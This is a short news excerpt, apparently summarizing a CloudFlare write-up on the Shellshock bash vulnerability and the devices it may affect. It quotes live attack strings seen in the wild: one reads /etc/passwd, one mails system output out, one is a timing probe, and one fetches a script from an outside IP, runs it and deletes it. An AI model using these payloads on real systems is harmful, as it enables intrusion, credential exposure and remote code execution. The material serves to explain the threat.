CloudFlare explains Shellshock: it potentially affects web servers, set-top boxes, laptops and telephones

Shellshock is a simple exploit that is seriously bad; CloudFlare talks about how they patched their system so quickly

Inside Shellshock: How hackers are using it to exploit systems.

On Wednesday of last week, details of the Shellshock bash bug emerged. This bug started a scramble to patch computers, servers, routers, firewalls, and other computing appliances using vulnerable versions of bash.

Get system passwords:

() {:;}; /bin/cat /etc/passwd

Email the attacker:

() { :;}; /bin/bash -c “whoami | mail -s ‘ l’


() { :;}; /bin/sleep 20|/sbin/sleep 20|/usr/bin/sleep 20

Run Arbitrary script:

() { :;}; /bin/bash -c “cd /tmp;wget http://213.x.x.x/ji;curl -O /tmp/ji http://213.x.x.x/ji ; perl /tmp/ji;rm -rf /tmp/ji”

Shellshock isn’t just an attack on web sites: it’s an attack on anything that’s running bash and accessible across the Internet. That could include hardware devices, set-top boxes, laptop computers, even, perhaps, telephones.

Read the full article at